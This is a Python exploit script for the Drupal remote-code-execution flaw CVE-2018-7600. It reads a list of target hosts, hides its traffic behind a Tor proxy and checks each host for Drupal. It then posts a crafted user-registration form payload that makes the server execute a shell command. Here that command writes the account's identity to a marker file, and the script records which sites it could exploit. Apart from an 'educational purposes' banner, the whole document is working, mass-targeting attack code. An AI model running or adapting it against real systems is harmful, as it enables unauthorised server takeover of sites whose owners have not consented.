#!/usr/bin/env python3
import sys
from random import sample
from readline import parse_and_bind
from string import ascii_lowercase

from requests import session, Timeout, RequestException
# ANSI-coloured log prefixes used by every print() in this script
info = '\033[1;33m[!]\033[1;m '   # yellow: informational
que = '\033[1;34m[?]\033[1;m '    # blue: prompt
bad = '\033[1;31m[-]\033[1;m '    # red: failure
good = '\033[1;32m[+]\033[1;m '   # green: success

# Configuration flags (there is no command-line parsing; edit these here)
ignore_warnings = False  # exploit_from_file proceeds even when liveness/version checks fail
cleanup = False          # cleanup_file sends rm_command after the marker file is verified
write_file = True        # main writes the collected targets to the file "exploitable"
tor_proxy = True         # session_setup routes the session through the local Tor SOCKS proxy

# Marker file name: five distinct lowercase letters plus ".txt", chosen once per run
random_file_name = f"{''.join(sample(ascii_lowercase, 5))}.txt"

# Shell command that records the executing account into the marker file
user_data_command = f"echo Name: $(id -un) UID: $(id -u) Groups: $(id -Gn) | tee {random_file_name}"
# Shell command that fetches a file (placeholder file name and URL; unused by default)
download_command = "curl -so example_file.html https://example.com"
# Shell command that removes the marker file again
rm_command = f"rm {random_file_name}"
# The command cve_2018_7600 actually sends
selected_command = user_data_command
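def session_setup():
    """Create the requests session used for every HTTP call in this script.

    When `tor_proxy` is set, both http and https traffic is routed through
    the local Tor SOCKS listener at 127.0.0.1:9050. The `socks` import only
    confirms that pysocks is installed; if it is missing, an error is printed
    and the script exits with status 1. `sys.exit` is used rather than the
    site-module `exit` helper so the behaviour does not depend on how the
    interpreter was started. Returns the configured session.
    """
    http_session = session()
    if not tor_proxy:
        return http_session
    # Only the import can raise ImportError, so keep the try block to that line.
    try:
        import socks  # noqa: F401 -- presence check only
    except ImportError:
        print(
            bad +
            "Error importing socks to to Tor, make sure to `pip3 install pysocks`"
        )
        sys.exit(1)
    proxy_url = 'socks5://127.0.0.1:9050'
    http_session.proxies = {'http': proxy_url, 'https': proxy_url}
    return http_session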
def whats_my_ip(session):
    """Print the public address that httpbin.org sees for `session`.

    main calls this right after session_setup, so the printed address
    reflects whichever proxy configuration the session carries.
    Output goes to stdout only; nothing is returned.
    """
    origin = session.get("http://httpbin.org/ip").json()["origin"]
    print(f"{good}Your IP: {origin}")
def cleanup_url(target):
    """Normalise one line of the targets file into a base URL.

    Surrounding whitespace (including the trailing newline) is dropped,
    "http://" is prefixed unless the line already starts with "http"
    (so an "https://" entry is left alone), and a trailing "/" is ensured
    so that paths can be appended by plain concatenation.
    """
    url = target.strip()
    scheme = "" if url.startswith('http') else "http://"
    url = scheme + url
    tail = "" if url.endswith('/') else '/'
    return url + tail
def is_website_up(website, session):
    """Return True only when a GET on `website` answers 200 within 5 seconds.

    A Timeout counts as down without any output; any other RequestException
    is printed with the `bad` prefix and also counts as down.
    """
    try:
        reply = session.get(website, timeout=5)
    except Timeout:
        return False
    except RequestException as err:
        print(f"{bad}{website} RequestException: ")
        print(f"{bad}{err}")
        return False
    return reply.status_code == 200
def drupal_version(website, session):
    """Return the version string from the X-Generator header, or None.

    The " (https://www.drupal.org)" suffix is stripped before the value is
    printed and returned. A missing header is reported with the `bad`
    prefix and yields None. Unlike is_website_up, this GET carries no
    timeout.
    """
    headers = session.get(website).headers
    try:
        raw_generator = headers["X-Generator"]
    except KeyError:
        print(f"{bad}{website} does not appear to be running Drupal")
        return None
    version = raw_generator.replace(" (https://www.drupal.org)", "")
    print(f"{good}Drupal Version: {version}")
    return version
def generate_payload(command):
    """Build the form fields that send_payload posts.

    Every key is fixed except `mail[#markup]`, which carries `command`.
    Insertion order matches the original literal so the encoded body is
    unchanged.
    """
    fields = {
        'form_id': 'user_register_form',
        '_drupal_ajax': '1',
    }
    fields['mail[#post_render][]'] = 'exec'
    fields['mail[#type]'] = 'markup'
    fields['mail[#markup]'] = command
    return fields
def send_payload(target, payload, session):
    """POST `payload` to the user-registration AJAX endpoint under `target`.

    `target` is expected to already end with "/" (see cleanup_url); the
    endpoint path is concatenated directly. The requests Response is
    returned unchanged so that callers can inspect status_code.
    """
    endpoint = (
        'user/register'
        '?element_parents=account/mail/%23value'
        '&ajax_form=1'
        '&_wrapper_format=drupal_ajax'
    )
    return session.post(f"{target}{endpoint}", data=payload)
def send_command(target, command, session):
    """Wrap `command` with generate_payload and post it via send_payload.

    Returns whatever send_payload returns (the requests Response).
    """
    body = generate_payload(command)
    return send_payload(target, body, session)
def check_if_file_created(target, file_name, session):
    """Fetch `target + file_name` and report whether the marker file exists.

    Any status other than 404 is treated as "created" (so a 403 or 500
    would count as well). On that path the response body is printed,
    cleanup_file is invoked, and True is returned; a 404 prints a failure
    line and returns False.
    """
    marker_url = target + file_name
    print(f"{good}Checking... {marker_url}")
    reply = session.get(marker_url)
    if reply.status_code == 404:
        print(f"{bad}{target} File creation unsuccessful")
        return False
    print(f"{good}File successfully created:")
    print("    " + reply.text.strip())
    cleanup_file(target, file_name, session)
    return True
def cleanup_file(target, file_name, session):
    """Delete the marker file on `target`, but only when `cleanup` is enabled.

    `file_name` is used for the log line only; the command actually sent
    is the module-level rm_command, which always names random_file_name.
    """
    if not cleanup:
        return
    print(f"{good}Deleting... {target}{file_name}")
    send_command(target, rm_command, session)
def cve_2018_7600(target, session):
    """Send selected_command to `target` and verify via the marker file.

    A 200 on the POST only means the endpoint accepted the request; the
    decisive check is check_if_file_created on random_file_name, whose
    result is returned. Any other status prints "Not exploitable" and
    returns False.
    """
    reply = send_command(target, selected_command, session)
    if reply.status_code != 200:
        print(f"{bad}{target} Not exploitable")
        return False
    print(f"{good}{target} Possibly exploitable")
    return check_if_file_created(target, random_file_name, session)
def exploit_from_file(file_name, session):
    """Run the check against every line of `file_name`; return the hits.

    Each line is normalised with cleanup_url. A target that fails
    is_website_up is reported as "is down" and skipped; one for which
    drupal_version returns a falsy value is skipped (drupal_version prints
    its own message). `ignore_warnings` bypasses both gates. Targets for
    which cve_2018_7600 returns True are collected in input order.
    """
    hits = []
    with open(file_name) as targets:
        for line in targets:
            target = cleanup_url(line)
            if not (is_website_up(target, session) or ignore_warnings):
                print(f"{bad}{target} is down")
                continue
            if not (drupal_version(target, session) or ignore_warnings):
                continue
            if cve_2018_7600(target, session):
                hits.append(target)
    return hits
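def write_to_file(vulnerable_sites):
    """Write `vulnerable_sites` to the file "exploitable", one URL per line.

    Nothing is written (and the file is neither created nor truncated)
    when the list is empty. A newline is appended to each entry:
    cleanup_url strips the newline from every input line, so without the
    separator all targets would run together on a single line.
    """
    if not vulnerable_sites:
        return
    with open("exploitable", "w", encoding="utf-8") as out:
        out.writelines(f"{site}\n" for site in vulnerable_sites)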
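if __name__ == '__main__':
    try:
        print(info +
              'Provided only for educational or information purposes.'.upper())
        # readline: enable tab-completion for the path prompt below
        parse_and_bind('tab: complete')
        file_name = input(que + 'Enter file name (example: /root/file/hosts.txt): ')
        requests_session = session_setup()
        whats_my_ip(requests_session)
        # Keep the result under its own name; rebinding `exploit_from_file`
        # here used to shadow the function with its return value.
        vulnerable_sites = exploit_from_file(file_name, requests_session)
        if write_file:
            write_to_file(vulnerable_sites)
    except KeyboardInterrupt:
        print(bad + "Exiting...")
        sys.exit(0)
    except RequestException as error:
        # Any RequestException is attributed to Tor when tor_proxy is set,
        # even one raised by a target request.
        if tor_proxy:
            print(bad +
                  "Error connection to Tor, start Tor or disable `tor_proxy`")
        else:
            print(bad + "Connection Error: " + str(error))
        sys.exit(1)
    except Exception as error:
        print(bad + str(error))
        print(
            bad +
            "Oops, please go to https://github.com/thehappydinoa/CVE-2018-7600 and create an issue"
        )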